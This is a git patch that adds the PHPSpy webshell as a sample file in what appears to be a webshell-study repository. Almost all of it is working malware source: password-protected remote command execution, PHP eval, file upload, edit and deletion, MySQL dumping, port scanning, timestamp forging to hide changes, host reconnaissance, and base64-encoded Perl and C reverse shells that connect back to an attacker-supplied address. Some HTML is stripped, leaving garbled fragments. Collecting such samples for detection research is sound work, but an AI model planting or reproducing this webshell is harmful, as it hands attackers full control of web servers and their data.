From ea6aff6e4ff8036161d372ef7e1484cb533aad8f Mon Sep 17 00:00:00 2001 From: v1ll4n Date: Fri, 5 Jul 2024 15:27:15 +0800 Subject: [PATCH] add phpspy as demo --- php-webshell/sample/phpspy.php | 1610 ++++++++++++++++++++++++++++++++ 1 file changed, 1610 insertions(+) create mode 100644 php-webshell/sample/phpspy.php diff --git a/php-webshell/sample/phpspy.php b/php-webshell/sample/phpspy.php new file mode 100644 index 0000000..5522493 --- /dev/null +++ b/php-webshell/sample/phpspy.php @@ -0,0 +1,1610 @@ + 'big5', + 'cp-866' => 'cp866', + 'euc-jp' => 'ujis', + 'euc-kr' => 'euckr', + 'gbk' => 'gbk', + 'iso-8859-1' => 'latin1', + 'koi8-r' => 'koi8r', + 'koi8-u' => 'koi8u', + 'utf-8' => 'utf8', + 'windows-1252' => 'latin1', +); + +$act = isset($P['act']) ? $P['act'] : ''; +$charset = isset($P['charset']) ? $P['charset'] : 'gbk'; +$doing = isset($P['doing']) ? $P['doing'] : ''; + +for ($i=1;$i<=4;$i++) { + ${'p'.$i} = isset($P['p'.$i]) ? $P['p'.$i] : ''; +} + +if (isset($charsetdb[$charset])) { + header("content-Type: text/html; charset=".$charset); +} + +$timestamp = time(); + +/* 身份验证 */ +if ($act == "logout") { + scookie('loginpass', '', -86400 * 365); + @header('Location: '.SELF); + exit; +} +if($pass) { + if ($act == 'login') { + if ($pass == encode_pass($P['password'])) { + scookie('loginpass',encode_pass($P['password'])); + @header('Location: '.SELF); + exit; + } + } + if (isset($_COOKIE['loginpass'])) { + if ($_COOKIE['loginpass'] != $pass) { + loginpage(); + } + } else { + loginpage(); + } +} +/* 验证结束 */ + +$errmsg = ''; +$uchar = '▲'; +$dchar = '▼'; +!$act && $act = 'file'; + +//当前目录/设置工作目录/网站根目录 +$home_cwd = getcwd(); +if (isset($P['cwd']) && $P['cwd']) { + chdir($P['cwd']); +} else { + chdir(SA_ROOT); +} +$cwd = getcwd(); +$web_cwd = $_SERVER['DOCUMENT_ROOT']; +foreach (array('web_cwd','cwd','home_cwd') as $k) { + if (IS_WIN) { + $$k = str_replace('\\', '/', $$k); + } + if (substr($$k, -1) != '/') { + $$k = $$k.'/'; + } +} + +// 查看PHPINFO +if ($act == 'phpinfo') { + if (IS_PHPINFO) { + phpinfo(); + exit; + } else { + $errmsg = 'phpinfo() function has disabled'; + } +} + +if(!function_exists('scandir')) { + function scandir($cwd) { + $files = array(); + $dh = opendir($cwd); + while ($file = readdir($dh)) { + $files[] = $file; + } + return $files ? $files : 0; + } +} + +if ($act == 'down') { + if (is_file($p1) && is_readable($p1)) { + @ob_end_clean(); + $fileinfo = pathinfo($p1); + if (function_exists('mime_content_type')) { + $type = @mime_content_type($p1); + header("Content-Type: ".$type); + } else { + header('Content-type: application/x-'.$fileinfo['extension']); + } + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.sprintf("%u", @filesize($p1))); + @readfile($p1); + exit; + } else { + $errmsg = 'Can\'t read file'; + $act = 'file'; + } +} +?> + + + + <?php echo $act.' - '.$_SERVER['HTTP_HOST'];?> + + + + + 'opform')); + makehide('act', $act); + makehide('cwd', $cwd); + makehide('p1', $p1); + makehide('p2', $p2); + makehide('p3', $p3); + makehide('p4', $p4); + makehide('charset', $charset); + formfoot(); + + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $uid = $uid['uid']; + $user = $uid['name']; + $gid = $gid['gid']; + $group = $gid['name']; + } + ?> + + + + + + + +
/ User: ()
+ Charset: + 'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);')); + ?> + + Logout | + File Manager | + MYSQL Manager | + Execute Command | + PHP Variable | + Port Scan | + Security information | + Eval PHP Code + | Back Connect +
+ '); + + $sort = array('filename', 1); + if($p1) { + if(preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) { + $sort = array($match[1], (int)$match[2]); + } + } + + formhead(array('name'=>'flist')); + makehide('act','file'); + makehide('p1',''); + makehide('cwd',$cwd); + makehide('charset',$charset); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + //查看所有可写文件和目录 + $dirdata=$filedata=array(); + + if ($p4 == 'dir') { + $dirdata = GetWDirList($cwd); + $filedata = array(); + } else { + // 默认目录列表 + $dirs = @scandir($cwd); + if ($dirs) { + $dirs = array_diff($dirs, array('.')); + foreach ($dirs as $file) { + $filepath=$cwd.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['chmod']=getChmod($filepath); + $dirdb['perm']=PermsColor($filepath); + $dirdb['owner']=getUser($filepath); + $dirdb['link']=$filepath; + if ($file=='..') { + $dirdata['up']=1; + } else { + $dirdata[]=$dirdb; + } + } else { + $filedb['filename']=$file; + //$filedb['size']=@filesize($filepath); + $filedb['size']=sprintf("%u", @filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['chmod']=getChmod($filepath); + $filedb['perm']=PermsColor($filepath); + $filedb['owner']=getUser($filepath); + $filedb['link']=$filepath; + $filedata[]=$filedb; + } + } + unset($dirdb); + unset($filedb); + } + } + $dir_i = '0'; + if (isset($dirdata['up'])) { + $thisbg = bg(); + p(''); + p(''); + p(''); + } + unset($dirdata['up']); + usort($dirdata, 'cmp'); + usort($filedata, 'cmp'); + foreach($dirdata as $key => $dirdb){ + if($p1 == 'getsize' && $p2 == $dirdb['filename']) { + $attachsize = dirsize($p2); + $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown'; + } else { + $attachsize = 'Stat'; + } + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } + + p(''); + $file_i = '0'; + + foreach($filedata as $key => $filedb){ + $fileurl = '/'.str_replace($web_cwd,'',$filedb['link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + p(''); + p('
+ $('opform').p1.value='';$('opform').p2.value='';"; + } + //操作完毕 + $free = @disk_free_space($cwd); + !$free && $free = 0; + $all = @disk_total_space($cwd); + !$all && $all = 0; + $used = $all-$free; + p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

'); + + $cwd_links = ''; + $path = explode('/', $cwd); + $n=count($path); + for($i=0;$i<$n-1;$i++) { + $cwd_links .= ''.$path[$i].'/'; + } + + ?> + +
+
+ + + + + +
()
+ + + + + + + +
+ '); + foreach( range('A','Z') as $drive ) { + if (is_dir($drive.':/')) { + p($comma.''.$drive.':\'); + $comma = '|'; + } + } + p('
'); + } + ?> + + '); + p('
'); + p('
'); + p('WebRoot'); + p(' | ScriptPath'); + p(' | View Writable Directory '); + p(' | Create Directory | Create File'); + p('
Filename '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1' || !$p1 ? $uchar : '').'Last modified '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1' ? $uchar : '').'Size '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ? $uchar : '').'Chmod / PermsAction
-Parent Directory
'.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.''); + p(''.$dirdb['chmod'].' / '); + p(''.$dirdb['perm'].''.$dirdb['owner'].'Rename
'.((strpos($filedb['link'], $web_cwd) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.sizecount($filedb['size']).''); + p(''.$filedb['chmod'].' / '); + p(''.$filedb['perm'].''.$filedb['owner'].''); + p('Down | '); + p('Edit | '); + p('Rename'); + p('
Delete | Copy | Move'.(isset($_SESSION['do']) && @count($_SESSION['dl']) ? ' | Paste' : '').''.$dir_i.' directories / '.$file_i.' files
'); + }// end dir + + elseif ($act == 'mysqladmin') { + $order = isset($P['order']) ? $P['order'] : ''; + $dbhost = isset($P['dbhost']) ? $P['dbhost'] : ''; + $dbuser = isset($P['dbuser']) ? $P['dbuser'] : ''; + $dbpass = isset($P['dbpass']) ? $P['dbpass'] : ''; + $dbname = isset($P['dbname']) ? $P['dbname'] : ''; + $tablename = isset($P['tablename']) ? $P['tablename'] : ''; + + if ($doing == 'dump') { + if (isset($P['bak_table']) && $P['bak_table']) { + $DB = new DB_MySQL; + $DB->charsetdb = $charsetdb; + $DB->charset = $charset; + $DB->connect($dbhost, $dbuser, $dbpass, $dbname); + if ($P['saveasfile'] && $P['bak_path']) { + $fp = @fopen($P['bak_path'],'w'); + if ($fp) { + foreach($P['bak_table'] as $k => $v) { + if ($v) { + $DB->sqldump($v, $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$P['bak_path']); + m('Database has backup to '.$P['bak_path'].''); + } else { + m('Backup failed'); + } + } else { + @ob_end_clean(); + $filename = basename($dbname.'.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + foreach($P['bak_table'] as $k => $v) { + if ($v) { + $DB->sqldump($v); + } + } + exit; + } + $DB->close(); + } else { + m('Please choose the table'); + } + $doing = ''; + } + + formhead(array('title'=>'MYSQL Manager', 'name'=>'dbform')); + makehide('act','mysqladmin'); + makehide('doing',$doing); + makehide('charset', $charset); + makehide('tablename', $tablename); + makehide('order', $order); + p('

'); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + makeinput(array('value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

'); + + if ($dbhost && $dbuser && isset($dbpass)) { + + // 初始化数据库类 + $DB = new DB_MySQL; + $DB->charsetdb = $charsetdb; + $DB->charset = $charset; + $DB->connect($dbhost, $dbuser, $dbpass, $dbname); + + //获取数据库信息 + p('

MySQL '.$DB->version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); + $highver = $DB->version() > '4.1' ? 1 : 0; + + //获取数据库 + $query = $DB->query("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = $DB->fetch($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)')); + + if ($dbname) { + p('

Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Structure ]'); + } + p('

'); + + $sql_query = isset($P['sql_query']) ? $P['sql_query'] : ''; + + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename LIMIT 0, 30"; + } + if ($tablename && $doing == 'structure') { + $sql_query = "SHOW FULL COLUMNS FROM $tablename;\n"; + $sql_query .= "SHOW INDEX FROM $tablename;"; + } + p('

Run SQL query/queries on database '.$dbname.':

'); + if ($sql_query) { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); + switch($DB->query_res($query)) + { + case 0: + p('

'.$DB->halt('Error').'

'); + break; + case 1: + $result = $DB->query($query); + $tatol = $DB->num_rows($result); + p(''); + p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + p(''); + } + p(''); + + if (!$tatol) { + p(''); + } else { + while($mn = $DB->fetch($result)){ + $thisbg = bg(); + p(''); + //读取记录用 + foreach($mn as $key=>$inside){ + p(''); + } + p(''); + unset($b1); + } + } + p('
'.@mysql_field_name($result, $i).'
No records
'.(($inside == null) ? 'null' : html_clean($inside)).'
'); + break; + case 2: + p('

Affected Rows : '.$DB->affected_rows().'

'); + break; + } + } + } + } else { + $query = $DB->query("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = $DB->fetch($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + if (count($tabledb)) { + if ($highver) { + $db_engine = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'storage_engine';")); + $db_collation = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'collation_database';")); + } + $sort = array('Name', 1); + if($order) { + if(preg_match('!s_([A-z_]+)_(\d{1})!', $order, $match)) { + $sort = array($match[1], (int)$match[2]); + } + } + usort($tabledb, 'cmp'); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + p(""); + p("
Name '.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ? $uchar : '').'Rows'.($order == 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar : '').'Data_length'.($order == 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar : '').'Create_time'.($order == 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar : '').'Update_time'.($order == 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar : '').'EngineCollationOther
'.$table['Name'].''.$table['Rows'].' '.sizecount($table['Data_length']).''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Structure
 '.$table_num.' table(s)'.$table_rows.''.$data_size.'  '.$db_engine['Value'].''.$db_collation['Value'].' 
Save as file
"); + } else { + p('

No tables

'); + } + $DB->free_result($query); + } + } + $DB->close(); + } + formfoot(); + }//end mysql + + elseif ($act == 'backconnect') { + + !$p2 && $p2 = $_SERVER['REMOTE_ADDR']; + !$p3 && $p3 = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($p1 == 'start' && $p2 && $p3 && $p4){ + if ($p4 == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc ".$p2." ".$p3." &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc ".$p2." ".$p3." &"); + } + m('Now script try connect to '.$p2.':'.$p3.' ...'); + } + + formhead(array('title'=>'Back Connect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);return false;')); + p('

'); + p('Your IP:'); + makeinput(array('name'=>'p2','size'=>20,'value'=>$p2)); + p('Your Port:'); + makeinput(array('name'=>'p3','size'=>15,'value'=>$p3)); + p('Use:'); + makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4)); + makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt')); + p('

'); + formfoot(); + }//end + + elseif ($act == 'portscan') { + !$p2 && $p2 = '127.0.0.1'; + !$p3 && $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958'; + formhead(array('title'=>'Port Scan', 'onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);return false;')); + p('

'); + p('IP:'); + makeinput(array('name'=>'p2','size'=>20,'value'=>$p2)); + p('Port:'); + makeinput(array('name'=>'p3','size'=>80,'value'=>$p3)); + makeinput(array('value'=>'Scan','type'=>'submit','class'=>'bt')); + p('

'); + formfoot(); + + if ($p1 == 'start') { + p('

Result »

'); + p(''); + } + } + + elseif ($act == 'eval') { + $phpcode = trim($p1); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code', 'onsubmit'=>'g(\'eval\',null,this.p1.value);return false;')); + maketext(array('title'=>'PHP Code','name'=>'p1', 'value'=>$phpcode)); + p('

Get plugins

'); + formfooter(); + }//end eval + + elseif ($act == 'editfile') { + + // 编辑文件 + if ($p1 == 'edit' && $p2 && $p3) { + $fp = @fopen($p2,'w'); + m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed')); + @fclose($fp); + } + $contents = ''; + if(file_exists($p2)) { + $fp=@fopen($p2,'r'); + $contents=@fread($fp, filesize($p2)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File', 'onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);return false;')); + makeinput(array('title'=>'Filename','name'=>'p2','value'=>$p2,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'p3','value'=>$contents)); + formfooter(); + goback(); + + }//end editfile + + elseif ($act == 'newtime') { + $filemtime = @filemtime($p1); + + formhead(array('title'=>'Clone folder/file was last modified time', 'onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);return false;')); + makeinput(array('title'=>'Alter folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference folder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1)); + formfooter(); + + formhead(array('title'=>'Set last modified', 'onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;')); + makeinput(array('title'=>'Current folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Modify time','name'=>'p3','value'=>date("Y-m-d H:i:s", $filemtime),'size'=>120,'newline'=>1)); + formfooter(); + + goback(); + }//end newtime + + elseif ($act == 'shell') { + formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;')); + p('

'); + makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1))); + makeinput(array('class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

'); + formfoot(); + + if ($p1) { + p('
'.execute($p1).'
'); + } + }//end shell + + elseif ($act == 'phpenv') { + $d=array(); + if(function_exists('mysql_get_client_info')) + $d[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $d[] = "MSSQL"; + if(function_exists('pg_connect')) + $d[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $d[] = "Oracle"; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',(isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',(getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed')), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',($dis_func ? $dis_func : 'No')), + 24 => array('Supported databases',implode(', ', $d)), + 25 => array('cURL support',function_exists('curl_version') ? 'Yes' : 'No'), + 26 => array('Open base dir',getcfg('open_basedir')), + 27 => array('Safe mode exec dir',getcfg('safe_mode_exec_dir')), + 28 => array('Safe mode include dir',getcfg('safe_mode_include_dir')), + ); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

'.$hp[$a].' »

'); + p(''); + } + }//end phpenv + + elseif ($act == 'secinfo') { + + if( !IS_WIN ) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no'); + secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no'); + secparam('OS version', @file_get_contents('/proc/version')); + secparam('Distr name', @file_get_contents('/etc/issue.net')); + $safe_mode = @ini_get('safe_mode'); + if(!$GLOBALS['safe_mode']) { + $temp=array(); + foreach ($userful as $item) + if(which($item)){$temp[]=$item;} + secparam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(which($item)){$temp[]=$item;} + secparam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(which($item)){$temp[]=$item;} + secparam('Downloaders', implode(', ',$temp)); + secparam('Hosts', @file_get_contents('/etc/hosts')); + secparam('HDD space', execute('df -h')); + secparam('Mount options', @file_get_contents('/etc/fstab')); + } + } else { + secparam('OS Version',execute('ver')); + secparam('Account Settings',execute('net accounts')); + secparam('User Accounts',execute('net user')); + secparam('IP Configurate',execute('ipconfig -all')); + } + }//end + + else { + m('Undefined Action'); + } + + ?> + +
+ + querycount.' queries'; + } + ?> + + Powered by 2013 final. Copyright (C) 2004-2013 [S4T] All Rights Reserved. +
+ + + +'.$n.' »'); + p('
'); + if(strpos($v, "\n") === false) + p($v.'
'); + else + p('
'.$v.'
'); + p('
'); + } +} +function m($msg) { + echo '
'; + echo $msg; + echo '
'; +} +function s_array($array) { + return is_array($array) ? array_map('s_array', $array) : stripslashes($array); +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; + $key = ($prefix ? $cookiepre : '').$key; + $life = $life ? $life : $cookielife; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); +} +function loginpage() { + formhead(); + makehide('act','login'); + makeinput(array('name'=>'password','type'=>'password','size'=>'20')); + makeinput(array('type'=>'submit','value'=>'Login')); + formfoot(); + exit; +} +function execute($cfe) { + $res = ''; + if ($cfe) { + if(function_exists('system')) { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif(function_exists('passthru')) { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif(function_exists('shell_exec')) { + $res = @shell_exec($cfe); + } elseif(function_exists('exec')) { + @exec($cfe,$res); + $res = join("\n",$res); + } elseif(@is_resource($f = @popen($cfe,"r"))) { + $res = ''; + while(!@feof($f)) { + $res .= @fread($f,1024); + } + @pclose($f); + } + } + return $res; +} +function which($pr) { + $path = execute("which $pr"); + return ($path ? $path : $pr); +} +function cf($fname,$text){ + if($fp=@fopen($fname,'w')) { + @fputs($fp,@base64_decode($text)); + @fclose($fp); + } +} +function dirsize($cwd) { + $dh = @opendir($cwd); + $size = 0; + while($file = @readdir($dh)) { + if ($file != '.' && $file != '..') { + $path = $cwd.'/'.$file; + $size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path)); + } + } + @closedir($dh); + return $size; +} +// 页面调试信息 +function debuginfo() { + global $starttime; + $mtime = explode(' ', microtime()); + $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); + echo 'Processed in '.$totaltime.' second(s)'; +} + +// 清除HTML代码 +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// 获取权限 +function getChmod($file){ + return substr(base_convert(@fileperms($file),10,8),-4); +} + +function PermsColor($f) { + if (!is_readable($f)) { + return ''.getPerms($f).''; + } elseif (!is_writable($f)) { + return ''.getPerms($f).''; + } else { + return ''.getPerms($f).''; + } +} +function getPerms($file) { + $mode = @fileperms($file); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($file) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($file)); + if ($array && is_array($array)) { + return ' / '.$array['name'].''; + } + } + return ''; +} + +function copy_paste($c,$f,$d){ + if(is_dir($c.$f)){ + mkdir($d.$f); + $dirs = scandir($c.$f); + if ($dirs) { + $dirs = array_diff($dirs, array('..', '.')); + foreach ($dirs as $file) { + copy_paste($c.$f.'/',$file, $d.$f.'/'); + } + } + } 